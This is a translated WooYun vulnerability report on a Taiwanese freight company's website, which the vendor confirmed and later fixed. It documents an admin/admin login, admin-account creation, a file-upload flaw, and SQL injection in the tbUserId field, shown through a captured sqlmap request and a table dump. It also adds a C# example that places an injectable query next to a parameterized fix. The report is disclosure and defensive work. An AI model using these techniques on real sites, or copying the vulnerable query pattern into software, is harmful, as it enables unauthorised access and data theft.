
Vulnerability summary

Defect ID: wooyun-2015-0161926

Title: 華通航空貨運承攬有限公司 multiple vulnerabilities bundled (weak password, arbitrary file upload, SQL injection) (Taiwan)

Affected vendor: 華通航空貨運承攬有限公司

Author: Xmyth_夏洛克

Submitted: 2015-12-16 20:56

Fixed: 2016-02-01 19:48

Published: 2016-02-01 19:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner organisation (Hitcon Taiwan vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-12-16: Details sent to the vendor; awaiting vendor handling
2015-12-18: Vendor confirmed; details disclosed to the vendor only
2015-12-28: Details disclosed to core white hats and relevant domain experts
2016-01-07: Details disclosed to regular white hats
2016-01-17: Details disclosed to intern white hats
2016-02-01: Details disclosed to the public

Brief description:

As the title says.

Details:

URL:http://**.**.**.**/

[Screenshot: 网站.png (the website)]


1. Weak back-end (admin panel) password
admin/admin

[Screenshot: 后台.png (admin panel)]


New administrator accounts can be added.

[Screenshot: 添加管理员.png (adding an administrator)]


Proof of vulnerability:

2. Arbitrary file upload

[Screenshot: 上传.png (upload)]


3. SQL injection

[Screenshot: 注.png (injection)]


A single quote in the input triggers a database error.

[Screenshot: 报错.jpg (error message)]


The request was fed into sqlmap:

POST /admin/pages/CustUserEdit.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/admin/pages/CustUserEdit.aspx
Cookie: ASP.NET_SessionId=nxmevlikprgfn2vojukplyzn; .ASPXAUTH=2388C51300DD5828E590406391CC939796C83D76D680EE3323A40DAB86CB9E243851B8E194F1DFC133F987B3E91FCB7F99AD1A6A183E43A46C0BCD20A244303454AF99C5688D181E7572F168784694ACBE83A174C34BBE3EA79AD463CA26128BC87E28D0831275ED92BB3A8B4377D2F491CED0E2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 5517


The ctl00%24ContentPlaceHolder1%24ATabUser%24TabPanel1%24ctl01%24tbUserId parameter (the tbUserId search field) is not properly sanitized.

[Screenshot: 注入点.png (injection point)]


The database login has DBA privileges.

[Screenshot: dba.png (DBA privileges)]


Eight databases are affected.

[Screenshot: 8库.jpg (eight databases)]


web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Database: Northwind
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.[Order Details Extended] | 2155 |
| dbo.[Order Details] | 2155 |
| dbo.Invoices | 2155 |
| dbo.[Order Subtotals] | 830 |
| dbo.[Orders Qry] | 830 |
| dbo.Orders | 830 |
| dbo.[Customer and Suppliers by City] | 120 |
| dbo.[Quarterly Orders] | 86 |
| dbo.[Product Sales for 1997] | 77 |
| dbo.Products | 77 |
| dbo.[Alphabetical list of products] | 69 |
| dbo.[Current Product List] | 69 |
| dbo.[Products by Category] | 69 |
| dbo.[Products Above Average Price] | 25 |
| dbo.[Category Sales for 1997] | 8 |
+--------------------------------------+---------+
Database: Northwind
Table: Orders
[15 entries]
+---------+------------+------------+---------+---------+-------------------+----------------------------+--------------------+-------------+--------------------+-------------+--------------------------------------------+--------------------+----------------+
| OrderID | EmployeeID | CustomerID | ShipVia | Freight | ShipCity | ShipName | OrderDate | ShipRegion | ShippedDate | ShipCountry | ShipAddress | RequiredDate | ShipPostalCode |
+---------+------------+------------+---------+---------+-------------------+----------------------------+--------------------+-------------+--------------------+-------------+--------------------------------------------+--------------------+----------------+
| 10248 | 5 | VINET | 3 | 32.38 | Reims | Vins et alcools Chevalier | 07 4 1996 12:00AM | NULL | 07 16 1996 12:00AM | France | 59 rue de l'Abbaye | 08 1 1996 12:00AM | 51100 |
| 10249 | 6 | TOMSP | 1 | 11.61 | M\\?fcnster | Toms Spezialit\\?e4ten | 07 5 1996 12:00AM | NULL | 07 10 1996 12:00AM | Germany | Luisenstr. 48 | 08 16 1996 12:00AM | 44087 |
| 10250 | 4 | HANAR | 2 | 65.83 | Rio de Janeiro | Hanari Carnes | 07 8 1996 12:00AM | RJ | 07 12 1996 12:00AM | Brazil | Rua do Pa\\?e7o, 67 | 08 5 1996 12:00AM | 05454-876 |
| 10251 | 3 | VICTE | 1 | 41.34 | Lyon | Victuailles en stock | 07 8 1996 12:00AM | NULL | 07 15 1996 12:00AM | France | 2, rue du Commerce | 08 5 1996 12:00AM | 69004 |
| 10252 | 4 | SUPRD | 2 | 51.30 | Charleroi | Supr\\?eames d\\?e9lices | 07 9 1996 12:00AM | NULL | 07 11 1996 12:00AM | Belgium | Boulevard Tirou, 255 | 08 6 1996 12:00AM | B-6000 |
| 10253 | 3 | HANAR | 2 | 58.17 | Rio de Janeiro | Hanari Carnes | 07 10 1996 12:00AM | RJ | 07 16 1996 12:00AM | Brazil | Rua do Pa\\?e7o, 67 | 07 24 1996 12:00AM | 05454-876 |
| 10254 | 5 | CHOPS | 2 | 22.98 | Bern | Chop-suey Chinese | 07 11 1996 12:00AM | NULL | 07 23 1996 12:00AM | Switzerland | Hauptstr. 31 | 08 8 1996 12:00AM | 3012 |
| 10255 | 9 | RICSU | 3 | 148.33 | Gen\\?e8ve | Richter Supermarkt | 07 12 1996 12:00AM | NULL | 07 15 1996 12:00AM | Switzerland | Starenweg 5 | 08 9 1996 12:00AM | 1204 |
| 10256 | 3 | WELLI | 2 | 13.97 | Resende | Wellington Importadora | 07 15 1996 12:00AM | SP | 07 17 1996 12:00AM | Brazil | Rua do Mercado, 12 | 08 12 1996 12:00AM | 08737-363 |
| 10257 | 4 | HILAA | 3 | 81.91 | San Crist\\?f3bal | HILARION-Abastos | 07 16 1996 12:00AM | T\\?e1chira | 07 22 1996 12:00AM | Venezuela | Carrera 22 con Ave. Carlos Soublette #8-35 | 08 13 1996 12:00AM | 5022 |
| 10258 | 1 | ERNSH | 1 | 140.51 | Graz | Ernst Handel | 07 17 1996 12:00AM | NULL | 07 23 1996 12:00AM | Austria | Kirchgasse 6 | 08 14 1996 12:00AM | 8010 |
| 10259 | 4 | CENTC | 3 | 3.25 | M\\?e9xico D.F. | Centro comercial Moctezuma | 07 18 1996 12:00AM | NULL | 07 25 1996 12:00AM | Mexico | Sierras de Granada 9993 | 08 15 1996 12:00AM | 05022 |
| 10260 | 4 | OTTIK | 1 | 55.09 | K\\?f6ln | Ottilies K\\?e4seladen | 07 19 1996 12:00AM | NULL | 07 29 1996 12:00AM | Germany | Mehrheimerstr. 369 | 08 16 1996 12:00AM | 50739 |
| 10261 | 4 | QUEDE | 2 | 3.05 | Rio de Janeiro | Que Del\\?edcia | 07 19 1996 12:00AM | RJ | 07 30 1996 12:00AM | Brazil | Rua da Panificadora, 12 | 08 16 1996 12:00AM | 02389-673 |
| 10262 | 8 | RATTC | 3 | 48.29 | Albuquerque | Rattlesnake Canyon Grocery | 07 22 1996 12:00AM | NM | 07 25 1996 12:00AM | USA | 2817 Milton Dr. | 08 19 1996 12:00AM | 87110 |
+---------+------------+------------+---------+---------+-------------------+----------------------------+--------------------+-------------+--------------------+-------------+--------------------------------------------+--------------------+----------------+

Remediation:

1. Strengthen passwords
2. Restrict uploads
3. Sanitize parameters
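To make item 3 concrete for the CustUserEdit.aspx search that the report identifies, here is an added example (not the vendor's code) of the injectable concatenation pattern next to its parameterized replacement in C#/ADO.NET; the table name CustUser, the column names and the parameter length are assumptions, only the tbUserId field name comes from the report.

```csharp
// Added example, not the vendor's code. The CustUser table and its columns are
// assumed; only the tbUserId field name is taken from the report.
using System;
using System.Data;
using System.Data.SqlClient;

public static class CustUserSearch
{
    // Vulnerable pattern: the tbUserId value is spliced into the SQL text.
    // A single quote in the input breaks the string literal, which is exactly
    // the database error the report observed, and lets the input alter the query.
    public static DataTable SearchUnsafe(SqlConnection conn, string userId)
    {
        string sql = "SELECT UserId, Name FROM CustUser WHERE UserId = '" + userId + "'";
        using (var cmd = new SqlCommand(sql, conn))
        using (var da = new SqlDataAdapter(cmd))
        {
            var dt = new DataTable();
            da.Fill(dt);
            return dt;
        }
    }

    // Hardened pattern: the value travels as a typed parameter and is never part
    // of the SQL text, so quotes, comments and stacked statements in userId are inert.
    public static DataTable SearchSafe(SqlConnection conn, string userId)
    {
        const string sql = "SELECT UserId, Name FROM CustUser WHERE UserId = @UserId";
        using (var cmd = new SqlCommand(sql, conn))
        using (var da = new SqlDataAdapter(cmd))
        {
            // Length 50 is an assumed column width; match it to the real schema.
            cmd.Parameters.Add("@UserId", SqlDbType.NVarChar, 50).Value = userId;
            var dt = new DataTable();
            da.Fill(dt);
            return dt;
        }
    }
}
```

Parameterization removes the injection itself; the DBA-privilege finding is a separate issue and calls for running the web application under a least-privilege SQL Server login as well.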

Copyright notice: when reposting, please credit the source Xmyth_夏洛克@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-12-18 19:59

Vendor reply:

Thanks for the notification.

Latest status:

None yet.

